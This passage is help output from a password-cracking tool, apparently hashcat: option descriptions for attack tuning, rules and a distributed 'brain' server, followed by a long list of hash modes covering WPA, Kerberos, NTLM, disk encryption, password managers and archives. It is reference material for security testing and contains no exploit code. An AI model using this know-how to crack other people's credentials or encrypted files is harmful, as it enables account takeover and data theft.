     --speed-only               |      | Return expected speed of the attack, then quit       |
     --progress-only            |      | Return ideal progress step size and time to process  |
 -c, --segment-size             | Num  | Sets size in MB to cache from the wordfile to X      | -c 32
     --bitmap-min               | Num  | Sets minimum bits allowed for bitmaps to X           | --bitmap-min=24
     --bitmap-max               | Num  | Sets maximum bits allowed for bitmaps to X           | --bitmap-max=24
     --cpu-affinity             | Str  | Locks to CPU devices, separated with commas          | --cpu-affinity=1,2,3
     --hook-threads             | Num  | Sets number of threads for a hook (per compute unit) | --hook-threads=8
     --hash-info                |      | Show information for each hash-mode                  |
     --example-hashes           |      | Alias of --hash-info                                 |
     --backend-ignore-cuda      |      | Do not try to open CUDA interface on startup         |
     --backend-ignore-opencl    |      | Do not try to open OpenCL interface on startup       |
 -I, --backend-info             |      | Show info about detected backend API devices         | -I
 -d, --backend-devices          | Str  | Backend devices to use, separated with commas        | -d 1
 -D, --opencl-device-types      | Str  | OpenCL device-types to use, separated with commas    | -D 1
 -O, --optimized-kernel-enable  |      | Enable optimized kernels (limits password length)    |
 -M, --multiply-accel-disable   |      | Disable multiply kernel-accel with processor count   |
 -w, --workload-profile         | Num  | Enable a specific workload profile, see pool below   | -w 3
 -n, --kernel-accel             | Num  | Manual workload tuning, set outerloop step size to X | -n 64
 -u, --kernel-loops             | Num  | Manual workload tuning, set innerloop step size to X | -u 256
 -T, --kernel-threads           | Num  | Manual workload tuning, set thread count to X        | -T 64
     --backend-vector-width     | Num  | Manually override backend vector-width to X          | --backend-vector=4
     --spin-damp                | Num  | Use CPU for device synchronization, in percent       | --spin-damp=10
     --hwmon-disable            |      | Disable temperature and fanspeed reads and triggers  |
     --hwmon-temp-abort         | Num  | Abort if temperature reaches X degrees Celsius       | --hwmon-temp-abort=100
     --scrypt-tmto              | Num  | Manually override TMTO value for scrypt to X         | --scrypt-tmto=3
 -s, --skip                     | Num  | Skip X words from the start                          | -s 1000000
 -l, --limit                    | Num  | Limit X words from the start + skipped words         | -l 1000000
     --keyspace                 |      | Show keyspace base:mod values and quit               |
 -j, --rule-left                | Rule | Single rule applied to each word from left wordlist  | -j 'c'
 -k, --rule-right               | Rule | Single rule applied to each word from right wordlist | -k '^-'
 -r, --rules-file               | File | Multiple rules applied to each word from wordlists   | -r rules/best64.rule
 -g, --generate-rules           | Num  | Generate X random rules                              | -g 10000
     --generate-rules-func-min  | Num  | Force min X functions per rule                       |
     --generate-rules-func-max  | Num  | Force max X functions per rule                       |
     --generate-rules-func-sel  | Str  | Pool of rule operators valid for random rule engine  | --generate-rules-func-sel=ioTlc
     --generate-rules-seed      | Num  | Force RNG seed set to X                              |
 -1, --custom-charset1          | CS   | User-defined charset ?1                              | -1 ?l?d?u
 -2, --custom-charset2          | CS   | User-defined charset ?2                              | -2 ?l?d?s
 -3, --custom-charset3          | CS   | User-defined charset ?3                              |
 -4, --custom-charset4          | CS   | User-defined charset ?4                              |
     --identify                 |      | Shows all supported algorithms for input hashes      | --identify my.hash
 -i, --increment                |      | Enable mask increment mode                           |
     --increment-min            | Num  | Start mask incrementing at X                         | --increment-min=4
     --increment-max            | Num  | Stop mask incrementing at X                          | --increment-max=8
 -S, --slow-candidates          |      | Enable slower (but advanced) candidate generators    |
     --brain-server             |      | Enable brain server                                  |
     --brain-server-timer       | Num  | Update the brain server dump each X seconds (min:60) | --brain-server-timer=300
 -z, --brain-client             |      | Enable brain client, activates -S                    |
     --brain-client-features    | Num  | Define brain client features, see below              | --brain-client-features=3
     --brain-host               | Str  | Brain server host (IP or domain)                     | --brain-host=127.0.0.1
     --brain-port               | Port | Brain server port                                    | --brain-port=13743
     --brain-password           | Str  | Brain server authentication password                 | --brain-password=bZfhCvGUSjRq
     --brain-session            | Hex  | Overrides automatically calculated brain session     | --brain-session=0x2ae611db
     --brain-session-whitelist  | Hex  | Allow given sessions only, separated with commas     | --brain-session-whitelist=0x2ae611db
 
- [ Hash modes ] -
 
      # | Name                                                | Category
  ======+=====================================================+======================================
    900 | MD4                                                 | Raw Hash
      0 | MD5                                                 | Raw Hash
    100 | SHA1                                                | Raw Hash
   1300 | SHA2-224                                            | Raw Hash
   1400 | SHA2-256                                            | Raw Hash
  10800 | SHA2-384                                            | Raw Hash
   1700 | SHA2-512                                            | Raw Hash
  17300 | SHA3-224                                            | Raw Hash
  17400 | SHA3-256                                            | Raw Hash
  17500 | SHA3-384                                            | Raw Hash
  17600 | SHA3-512                                            | Raw Hash
   6000 | RIPEMD-160                                          | Raw Hash
    600 | BLAKE2b-512                                         | Raw Hash
  11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian    | Raw Hash
  11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian    | Raw Hash
   6900 | GOST R 34.11-94                                     | Raw Hash
   5100 | Half MD5                                            | Raw Hash
  17700 | Keccak-224                                          | Raw Hash
  17800 | Keccak-256                                          | Raw Hash
  17900 | Keccak-384                                          | Raw Hash
  18000 | Keccak-512                                          | Raw Hash
   6100 | Whirlpool                                           | Raw Hash
  10100 | SipHash                                             | Raw Hash
     70 | md5(utf16le($pass))                                 | Raw Hash
    170 | sha1(utf16le($pass))                                | Raw Hash
   1470 | sha256(utf16le($pass))                              | Raw Hash
  10870 | sha384(utf16le($pass))                              | Raw Hash
   1770 | sha512(utf16le($pass))                              | Raw Hash
     10 | md5($pass.$salt)                                    | Raw Hash, Salted and/or Iterated
     20 | md5($salt.$pass)                                    | Raw Hash, Salted and/or Iterated
   3800 | md5($salt.$pass.$salt)                              | Raw Hash, Salted and/or Iterated
   3710 | md5($salt.md5($pass))                               | Raw Hash, Salted and/or Iterated
   4110 | md5($salt.md5($pass.$salt))                         | Raw Hash, Salted and/or Iterated
   4010 | md5($salt.md5($salt.$pass))                         | Raw Hash, Salted and/or Iterated
  21300 | md5($salt.sha1($salt.$pass))                        | Raw Hash, Salted and/or Iterated
     40 | md5($salt.utf16le($pass))                           | Raw Hash, Salted and/or Iterated
   2600 | md5(md5($pass))                                     | Raw Hash, Salted and/or Iterated
   3910 | md5(md5($pass).md5($salt))                          | Raw Hash, Salted and/or Iterated
   3500 | md5(md5(md5($pass)))                                | Raw Hash, Salted and/or Iterated
   4400 | md5(sha1($pass))                                    | Raw Hash, Salted and/or Iterated
  20900 | md5(sha1($pass).md5($pass).sha1($pass))             | Raw Hash, Salted and/or Iterated
  21200 | md5(sha1($salt).md5($pass))                         | Raw Hash, Salted and/or Iterated
   4300 | md5(strtoupper(md5($pass)))                         | Raw Hash, Salted and/or Iterated
     30 | md5(utf16le($pass).$salt)                           | Raw Hash, Salted and/or Iterated
    110 | sha1($pass.$salt)                                   | Raw Hash, Salted and/or Iterated
    120 | sha1($salt.$pass)                                   | Raw Hash, Salted and/or Iterated
   4900 | sha1($salt.$pass.$salt)                             | Raw Hash, Salted and/or Iterated
   4520 | sha1($salt.sha1($pass))                             | Raw Hash, Salted and/or Iterated
  24300 | sha1($salt.sha1($pass.$salt))                       | Raw Hash, Salted and/or Iterated
    140 | sha1($salt.utf16le($pass))                          | Raw Hash, Salted and/or Iterated
  19300 | sha1($salt1.$pass.$salt2)                           | Raw Hash, Salted and/or Iterated
  14400 | sha1(CX)                                            | Raw Hash, Salted and/or Iterated
   4700 | sha1(md5($pass))                                    | Raw Hash, Salted and/or Iterated
   4710 | sha1(md5($pass).$salt)                              | Raw Hash, Salted and/or Iterated
  21100 | sha1(md5($pass.$salt))                              | Raw Hash, Salted and/or Iterated
  18500 | sha1(md5(md5($pass)))                               | Raw Hash, Salted and/or Iterated
   4500 | sha1(sha1($pass))                                   | Raw Hash, Salted and/or Iterated
   4510 | sha1(sha1($pass).$salt)                             | Raw Hash, Salted and/or Iterated
   5000 | sha1(sha1($salt.$pass.$salt))                       | Raw Hash, Salted and/or Iterated
    130 | sha1(utf16le($pass).$salt)                          | Raw Hash, Salted and/or Iterated
   1410 | sha256($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
   1420 | sha256($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
  22300 | sha256($salt.$pass.$salt)                           | Raw Hash, Salted and/or Iterated
  20720 | sha256($salt.sha256($pass))                         | Raw Hash, Salted and/or Iterated
   1440 | sha256($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
  20800 | sha256(md5($pass))                                  | Raw Hash, Salted and/or Iterated
  20710 | sha256(sha256($pass).$salt)                         | Raw Hash, Salted and/or Iterated
  21400 | sha256(sha256_bin($pass))                           | Raw Hash, Salted and/or Iterated
   1430 | sha256(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
  10810 | sha384($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
  10820 | sha384($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
  10840 | sha384($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
  10830 | sha384(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
   1710 | sha512($pass.$salt)                                 | Raw Hash, Salted and/or Iterated
   1720 | sha512($salt.$pass)                                 | Raw Hash, Salted and/or Iterated
   1740 | sha512($salt.utf16le($pass))                        | Raw Hash, Salted and/or Iterated
   1730 | sha512(utf16le($pass).$salt)                        | Raw Hash, Salted and/or Iterated
     50 | HMAC-MD5 (key = $pass)                              | Raw Hash, Authenticated
     60 | HMAC-MD5 (key = $salt)                              | Raw Hash, Authenticated
    150 | HMAC-SHA1 (key = $pass)                             | Raw Hash, Authenticated
    160 | HMAC-SHA1 (key = $salt)                             | Raw Hash, Authenticated
   1450 | HMAC-SHA256 (key = $pass)                           | Raw Hash, Authenticated
   1460 | HMAC-SHA256 (key = $salt)                           | Raw Hash, Authenticated
   1750 | HMAC-SHA512 (key = $pass)                           | Raw Hash, Authenticated
   1760 | HMAC-SHA512 (key = $salt)                           | Raw Hash, Authenticated
  11750 | HMAC-Streebog-256 (key = $pass), big-endian         | Raw Hash, Authenticated
  11760 | HMAC-Streebog-256 (key = $salt), big-endian         | Raw Hash, Authenticated
  11850 | HMAC-Streebog-512 (key = $pass), big-endian         | Raw Hash, Authenticated
  11860 | HMAC-Streebog-512 (key = $salt), big-endian         | Raw Hash, Authenticated
  11500 | CRC32                                               | Raw Checksum
  18700 | Java Object hashCode()                              | Raw Checksum
  25700 | MurmurHash                                          | Raw Checksum
  14100 | 3DES (PT = $salt, key = $pass)                      | Raw Cipher, Known-Plaintext attack
  14000 | DES (PT = $salt, key = $pass)                       | Raw Cipher, Known-Plaintext attack
  26401 | AES-128-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  26402 | AES-192-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  26403 | AES-256-ECB NOKDF (PT = $salt, key = $pass)         | Raw Cipher, Known-Plaintext attack
  15400 | ChaCha20                                            | Raw Cipher, Known-Plaintext attack
  14500 | Linux Kernel Crypto API (2.4)                       | Raw Cipher, Known-Plaintext attack
  14900 | Skip32 (PT = $salt, key = $pass)                    | Raw Cipher, Known-Plaintext attack
  11900 | PBKDF2-HMAC-MD5                                     | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                    | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                                  | Generic KDF
  12100 | PBKDF2-HMAC-SHA512                                  | Generic KDF
   8900 | scrypt                                              | Generic KDF
    400 | phpass                                              | Generic KDF
  16100 | TACACS+                                             | Network Protocols
  11400 | SIP digest authentication (MD5)                     | Network Protocols
   5300 | IKE-PSK MD5                                         | Network Protocols
   5400 | IKE-PSK SHA1                                        | Network Protocols
  25100 | SNMPv3 HMAC-MD5-96                                  | Network Protocols
  25000 | SNMPv3 HMAC-MD5-96/HMAC-SHA1-96                     | Network Protocols
  25200 | SNMPv3 HMAC-SHA1-96                                 | Network Protocols
  26700 | SNMPv3 HMAC-SHA224-128                              | Network Protocols
  26800 | SNMPv3 HMAC-SHA256-192                              | Network Protocols
  26900 | SNMPv3 HMAC-SHA384-256                              | Network Protocols
  27300 | SNMPv3 HMAC-SHA512-384                              | Network Protocols
   2500 | WPA-EAPOL-PBKDF2                                    | Network Protocols
   2501 | WPA-EAPOL-PMK                                       | Network Protocols
  22000 | WPA-PBKDF2-PMKID+EAPOL                              | Network Protocols
  22001 | WPA-PMK-PMKID+EAPOL                                 | Network Protocols
  16800 | WPA-PMKID-PBKDF2                                    | Network Protocols
  16801 | WPA-PMKID-PMK                                       | Network Protocols
   7300 | IPMI2 RAKP HMAC-SHA1                                | Network Protocols
  10200 | CRAM-MD5                                            | Network Protocols
  16500 | JWT (JSON Web Token)                                | Network Protocols
  19600 | Kerberos 5, etype 17, TGS-REP                       | Network Protocols
  19800 | Kerberos 5, etype 17, Pre-Auth                      | Network Protocols
  19700 | Kerberos 5, etype 18, TGS-REP                       | Network Protocols
  19900 | Kerberos 5, etype 18, Pre-Auth                      | Network Protocols
   7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth               | Network Protocols
  13100 | Kerberos 5, etype 23, TGS-REP                       | Network Protocols
  18200 | Kerberos 5, etype 23, AS-REP                        | Network Protocols
   5500 | NetNTLMv1 / NetNTLMv1+ESS                           | Network Protocols
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                      | Network Protocols
   5600 | NetNTLMv2                                           | Network Protocols
  27100 | NetNTLMv2 (NT)                                      | Network Protocols
   4800 | iSCSI CHAP authentication, MD5(CHAP)                | Network Protocols
   8500 | RACF                                                | Operating System
   6300 | AIX {smd5}                                          | Operating System
   6700 | AIX {ssha1}                                         | Operating System
   6400 | AIX {ssha256}                                       | Operating System
   6500 | AIX {ssha512}                                       | Operating System
   3000 | LM                                                  | Operating System
  19000 | QNX /etc/shadow (MD5)                               | Operating System
  19100 | QNX /etc/shadow (SHA256)                            | Operating System
  19200 | QNX /etc/shadow (SHA512)                            | Operating System
  15300 | DPAPI masterkey file v1                             | Operating System
  15900 | DPAPI masterkey file v2                             | Operating System
   7200 | GRUB 2                                              | Operating System
  12800 | MS-AzureSync PBKDF2-HMAC-SHA256                     | Operating System
  12400 | BSDi Crypt, Extended DES                            | Operating System
   1000 | NTLM                                                | Operating System
   9900 | Radmin2                                             | Operating System
   5800 | Samsung Android Password/PIN                        | Operating System
  13800 | Windows Phone 8+ PIN/password                       | Operating System
   2410 | Cisco-ASA MD5                                       | Operating System
   9200 | Cisco-IOS $8$ (PBKDF2-SHA256)                       | Operating System
   9300 | Cisco-IOS $9$ (scrypt)                              | Operating System
   5700 | Cisco-IOS type 4 (SHA256)                           | Operating System
   2400 | Cisco-PIX MD5                                       | Operating System
   8100 | Citrix NetScaler (SHA1)                             | Operating System
  22200 | Citrix NetScaler (SHA512)                           | Operating System
   1100 | Domain Cached Credentials (DCC), MS Cache           | Operating System
   2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2      | Operating System
   7000 | FortiGate (FortiOS)                                 | Operating System
  26300 | FortiGate256 (FortiOS256)                           | Operating System
    125 | ArubaOS                                             | Operating System
    501 | Juniper IVE                                         | Operating System
     22 | Juniper NetScreen/SSG (ScreenOS)                    | Operating System
  15100 | Juniper/NetBSD sha1crypt                            | Operating System
  26500 | iPhone passcode (UID key + System Keybag)           | Operating System
    122 | macOS v10.4, macOS v10.5, macOS v10.6               | Operating System
   1722 | macOS v10.7                                         | Operating System
   7100 | macOS v10.8+ (PBKDF2-SHA512)                        | Operating System
   3200 | bcrypt $2*$, Blowfish (Unix)                        | Operating System
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)           | Operating System
   1500 | descrypt, DES (Unix), Traditional DES               | Operating System
   7400 | sha256crypt $5$, SHA256 (Unix)                      | Operating System
   1800 | sha512crypt $6$, SHA512 (Unix)                      | Operating System
  24600 | SQLCipher                                           | Database Server
    131 | MSSQL (2000)                                        | Database Server
    132 | MSSQL (2005)                                        | Database Server
   1731 | MSSQL (2012, 2014)                                  | Database Server
  24100 | MongoDB ServerKey SCRAM-SHA-1                       | Database Server
  24200 | MongoDB ServerKey SCRAM-SHA-256                     | Database Server
     12 | PostgreSQL                                          | Database Server
  11100 | PostgreSQL CRAM (MD5)                               | Database Server
   3100 | Oracle H: Type (Oracle 7+)                          | Database Server
    112 | Oracle S: Type (Oracle 11+)                         | Database Server
  12300 | Oracle T: Type (Oracle 12+)                         | Database Server
   7401 | MySQL $A$ (sha256crypt)                             | Database Server
  11200 | MySQL CRAM (SHA1)                                   | Database Server
    200 | MySQL323                                            | Database Server
    300 | MySQL4.1/MySQL5                                     | Database Server
   8000 | Sybase ASE                                          | Database Server
   8300 | DNSSEC (NSEC3)                                      | FTP, HTTP, SMTP, LDAP Server
  25900 | KNX IP Secure - Device Authentication Code          | FTP, HTTP, SMTP, LDAP Server
  16400 | CRAM-MD5 Dovecot                                    | FTP, HTTP, SMTP, LDAP Server
   1411 | SSHA-256(Base64), LDAP {SSHA256}                    | FTP, HTTP, SMTP, LDAP Server
   1711 | SSHA-512(Base64), LDAP {SSHA512}                    | FTP, HTTP, SMTP, LDAP Server
  24900 | Dahua Authentication MD5                            | FTP, HTTP, SMTP, LDAP Server
  10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256)             | FTP, HTTP, SMTP, LDAP Server
  15000 | FileZilla Server >= 0.9.55                          | FTP, HTTP, SMTP, LDAP Server
  12600 | ColdFusion 10+                                      | FTP, HTTP, SMTP, LDAP Server
   1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR)               | FTP, HTTP, SMTP, LDAP Server
    141 | Episerver 6.x < .NET 4                              | FTP, HTTP, SMTP, LDAP Server
   1441 | Episerver 6.x >= .NET 4                             | FTP, HTTP, SMTP, LDAP Server
   1421 | hMailServer                                         | FTP, HTTP, SMTP, LDAP Server
    101 | nsldap, SHA-1(Base64), Netscape LDAP SHA            | FTP, HTTP, SMTP, LDAP Server
    111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA         | FTP, HTTP, SMTP, LDAP Server
   7700 | SAP CODVN B (BCODE)                                 | Enterprise Application Software (EAS)
   7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE             | Enterprise Application Software (EAS)
   7800 | SAP CODVN F/G (PASSCODE)                            | Enterprise Application Software (EAS)
   7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE        | Enterprise Application Software (EAS)
  10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1                 | Enterprise Application Software (EAS)
    133 | PeopleSoft                                          | Enterprise Application Software (EAS)
  13500 | PeopleSoft PS_TOKEN                                 | Enterprise Application Software (EAS)
  21500 | SolarWinds Orion                                    | Enterprise Application Software (EAS)
  21501 | SolarWinds Orion v2                                 | Enterprise Application Software (EAS)
     24 | SolarWinds Serv-U                                   | Enterprise Application Software (EAS)
   8600 | Lotus Notes/Domino 5                                | Enterprise Application Software (EAS)
   8700 | Lotus Notes/Domino 6                                | Enterprise Application Software (EAS)
   9100 | Lotus Notes/Domino 8                                | Enterprise Application Software (EAS)
  26200 | OpenEdge Progress Encode                            | Enterprise Application Software (EAS)
  20600 | Oracle Transportation Management (SHA256)           | Enterprise Application Software (EAS)
   4711 | Huawei sha1(md5($pass).$salt)                       | Enterprise Application Software (EAS)
  20711 | AuthMe sha256                                       | Enterprise Application Software (EAS)
  22400 | AES Crypt (SHA256)                                  | Full-Disk Encryption (FDE)
  27400 | VMware VMX (PBKDF2-HMAC-SHA1 + AES-256-CBC)         | Full-Disk Encryption (FDE)
  14600 | LUKS                                                | Full-Disk Encryption (FDE)
  13711 | VeraCrypt RIPEMD160 + XTS 512 bit                   | Full-Disk Encryption (FDE)
  13712 | VeraCrypt RIPEMD160 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
  13713 | VeraCrypt RIPEMD160 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode       | Full-Disk Encryption (FDE)
  13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode      | Full-Disk Encryption (FDE)
  13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode      | Full-Disk Encryption (FDE)
  13751 | VeraCrypt SHA256 + XTS 512 bit                      | Full-Disk Encryption (FDE)
  13752 | VeraCrypt SHA256 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
  13753 | VeraCrypt SHA256 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
  13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode          | Full-Disk Encryption (FDE)
  13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode         | Full-Disk Encryption (FDE)
  13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode         | Full-Disk Encryption (FDE)
  13721 | VeraCrypt SHA512 + XTS 512 bit                      | Full-Disk Encryption (FDE)
  13722 | VeraCrypt SHA512 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
  13723 | VeraCrypt SHA512 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
  13771 | VeraCrypt Streebog-512 + XTS 512 bit                | Full-Disk Encryption (FDE)
  13772 | VeraCrypt Streebog-512 + XTS 1024 bit               | Full-Disk Encryption (FDE)
  13773 | VeraCrypt Streebog-512 + XTS 1536 bit               | Full-Disk Encryption (FDE)
  13781 | VeraCrypt Streebog-512 + XTS 512 bit + boot-mode    | Full-Disk Encryption (FDE)
  13782 | VeraCrypt Streebog-512 + XTS 1024 bit + boot-mode   | Full-Disk Encryption (FDE)
  13783 | VeraCrypt Streebog-512 + XTS 1536 bit + boot-mode   | Full-Disk Encryption (FDE)
  13731 | VeraCrypt Whirlpool + XTS 512 bit                   | Full-Disk Encryption (FDE)
  13732 | VeraCrypt Whirlpool + XTS 1024 bit                  | Full-Disk Encryption (FDE)
  13733 | VeraCrypt Whirlpool + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  23900 | BestCrypt v3 Volume Encryption                      | Full-Disk Encryption (FDE)
  16700 | FileVault 2                                         | Full-Disk Encryption (FDE)
  27500 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-128-XTS)       | Full-Disk Encryption (FDE)
  27600 | VirtualBox (PBKDF2-HMAC-SHA256 & AES-256-XTS)       | Full-Disk Encryption (FDE)
  20011 | DiskCryptor SHA512 + XTS 512 bit                    | Full-Disk Encryption (FDE)
  20012 | DiskCryptor SHA512 + XTS 1024 bit                   | Full-Disk Encryption (FDE)
  20013 | DiskCryptor SHA512 + XTS 1536 bit                   | Full-Disk Encryption (FDE)
  22100 | BitLocker                                           | Full-Disk Encryption (FDE)
  12900 | Android FDE (Samsung DEK)                           | Full-Disk Encryption (FDE)
   8800 | Android FDE <= 4.3                                  | Full-Disk Encryption (FDE)
  18300 | Apple File System (APFS)                            | Full-Disk Encryption (FDE)
   6211 | TrueCrypt RIPEMD160 + XTS 512 bit                   | Full-Disk Encryption (FDE)
   6212 | TrueCrypt RIPEMD160 + XTS 1024 bit                  | Full-Disk Encryption (FDE)
   6213 | TrueCrypt RIPEMD160 + XTS 1536 bit                  | Full-Disk Encryption (FDE)
   6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode       | Full-Disk Encryption (FDE)
   6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode      | Full-Disk Encryption (FDE)
   6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode      | Full-Disk Encryption (FDE)
   6221 | TrueCrypt SHA512 + XTS 512 bit                      | Full-Disk Encryption (FDE)
   6222 | TrueCrypt SHA512 + XTS 1024 bit                     | Full-Disk Encryption (FDE)
   6223 | TrueCrypt SHA512 + XTS 1536 bit                     | Full-Disk Encryption (FDE)
   6231 | TrueCrypt Whirlpool + XTS 512 bit                   | Full-Disk Encryption (FDE)
   6232 | TrueCrypt Whirlpool + XTS 1024 bit                  | Full-Disk Encryption (FDE)
   6233 | TrueCrypt Whirlpool + XTS 1536 bit                  | Full-Disk Encryption (FDE)
  12200 | eCryptfs                                            | Full-Disk Encryption (FDE)
  10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4)                       | Documents
  10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1          | Documents
  10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2          | Documents
  10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8)                       | Documents
  25400 | PDF 1.4 - 1.6 (Acrobat 5 - 8) - edit password       | Documents
  10600 | PDF 1.7 Level 3 (Acrobat 9)                         | Documents
  10700 | PDF 1.7 Level 8 (Acrobat 10 - 11)                   | Documents
   9400 | MS Office 2007                                      | Documents
   9500 | MS Office 2010                                      | Documents
   9600 | MS Office 2013                                      | Documents
  25300 | MS Office 2016 - SheetProtection                    | Documents
   9700 | MS Office <= 2003 $0/$1, MD5 + RC4                  | Documents
   9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1     | Documents
   9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2     | Documents
   9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1       | Documents
   9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2       | Documents
   9800 | MS Office <= 2003 $3/$4, SHA1 + RC4                 | Documents
  18400 | Open Document Format (ODF) 1.2 (SHA-256, AES)       | Documents
  18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish)    | Documents
  16200 | Apple Secure Notes                                  | Documents
  23300 | Apple iWork                                         | Documents
   6600 | 1Password, agilekeychain                            | Password Managers
   8200 | 1Password, cloudkeychain                            | Password Managers
   9000 | Password Safe v2                                    | Password Managers
   5200 | Password Safe v3                                    | Password Managers
   6800 | LastPass + LastPass sniffed                         | Password Managers
  13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES)         | Password Managers
  23400 | Bitwarden                                           | Password Managers
  16900 | Ansible Vault                                       | Password Managers
  26000 | Mozilla key3.db                                     | Password Managers
  26100 | Mozilla key4.db                                     | Password Managers
  23100 | Apple Keychain                                      | Password Managers
  11600 | 7-Zip                                               | Archives
  12500 | RAR3-hp                                             | Archives
  23800 | RAR3-p (Compressed)                                 | Archives
  23700 | RAR3-p (Uncompressed)                               | Archives
  13000 | RAR5                                                | Archives
  17220 | PKZIP (Compressed Multi-File)                       | Archives
  17200 | PKZIP (Compressed)                                  | Archives
  17225 | PKZIP (Mixed Multi-File)                            | Archives
  17230 | PKZIP (Mixed Multi-File Checksum-Only)              | Archives
  17210 | PKZIP (Uncompressed)                                | Archives
  20500 | PKZIP Master Key                                    | Archives
  20510 | PKZIP Master Key (6 byte optimization)              | Archives
  23001 | SecureZIP AES-128                                   | Archives
  23002 | SecureZIP AES-192                                   | Archives
  23003 | SecureZIP AES-256                                   | Archives
  13600 | WinZip                                              | Archives
  18900 | Android Backup                                      | Archives
  24700 | Stuffit5                                            | Archives
  13200 | AxCrypt 1                                           | Archives
  13300 | AxCrypt 1 in-memory SHA1                            | Archives
  23500 | AxCrypt 2 AES-128                                   | Archives
  23600 | AxCrypt 2 AES-256                                   | Archives
  14700 | iTunes backup < 10.0                                | Archives
  14800 | iTunes backup >= 10.0                               | Archives
   8400 | WBB3 (Woltlab Burning Board)                        | Forums, CMS, E-Commerce
   2612 | PHPS                                                | Forums, CMS, E-Commerce
    121 | SMF (Simple Machines Forum) > v1.1                  | Forums, CMS, E-Commerce
   3711 | MediaWiki B type                                    | Forums, CMS, E-Commerce
   4521 | Redmine                                             | Forums, CMS, E-Commerce
  24800 | Umbraco HMAC-SHA1                                   | Forums, CMS, E-Commerce
     11 | Joomla < 2.5.18                                     | Forums, CMS, E-Commerce
  13900 | OpenCart                                            | Forums, CMS, E-Commerce
  11000 | PrestaShop                                          | Forums, CMS, E-Commerce
  16000 | Tripcode                                            | Forums, CMS, E-Commerce
   7900 | Drupal7                                             | Forums, CMS, E-Commerce
   4522 | PunBB                                               | Forums, CMS, E-Commerce
   2811 | MyBB 1.2+, IPB2+ (Invision Power Board)             | Forums, CMS, E-Commerce
   2611 | vBulletin < v3.8.5                                  | Forums, CMS, E-Commerce
   2711 | vBulletin >= v3.8.5                                 | Forums, CMS, E-Commerce
  25600 | bcrypt(md5($pass)) / bcryptmd5                      | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                    | Forums, CMS, E-Commerce
     21 | osCommerce, xt:Commerce                             | Forums, CMS, E-Commerce
  18100 | TOTP (HMAC-SHA1)                                    | One-Time Passwords
   2000 | STDOUT                                              | Plaintext
  99999 | Plaintext                                           | Plaintext
  21600 | Web2py pbkdf2-sha512                                | Framework
  10000 | Django (PBKDF2-SHA256)                              | Framework
    124 | Django (SHA-1)                                      | Framework
  12001 | Atlassian (PBKDF2-HMAC-SHA1)                        | Framework
  19500 | Ruby on Rails Restful-Authentication                | Framework
  27200 | Ruby on Rails Restful Auth (one round, no sitekey)  | Framework
  20200 | Python passlib pbkdf2-sha512                        | Framework
  20300 | Python passlib pbkdf2-sha256                        | Framework
  20400 | Python passlib pbkdf2-sha1                          | Framework
  24410 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA1 + 3DES/AES)   | Private Key
  24420 | PKCS#8 Private Keys (PBKDF2-HMAC-SHA256 + 3DES/AES) | Private Key
  15500 | JKS Java Key Store Private Keys (SHA1)              | Private Key
  22911 | RSA/DSA/EC/OpenSSH Private Keys ($0$)               | Private Key
  22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$)               | Private Key
  22931 | RSA/DSA/EC/OpenSSH Private Keys ($1, $3$)           | Private Key
  22941 | RSA/DSA/EC/OpenSSH Private Keys ($4$)               | Private Key
  22951 | RSA/DSA/EC/OpenSSH Private Keys ($5$)               | Private Key
  23200 | XMPP SCRAM PBKDF2-SHA1                              | Instant Messaging Service
  22600 | Telegram Desktop < v2.1.14 (PBKDF2-HMAC-SHA1)       | Instant Messaging Service
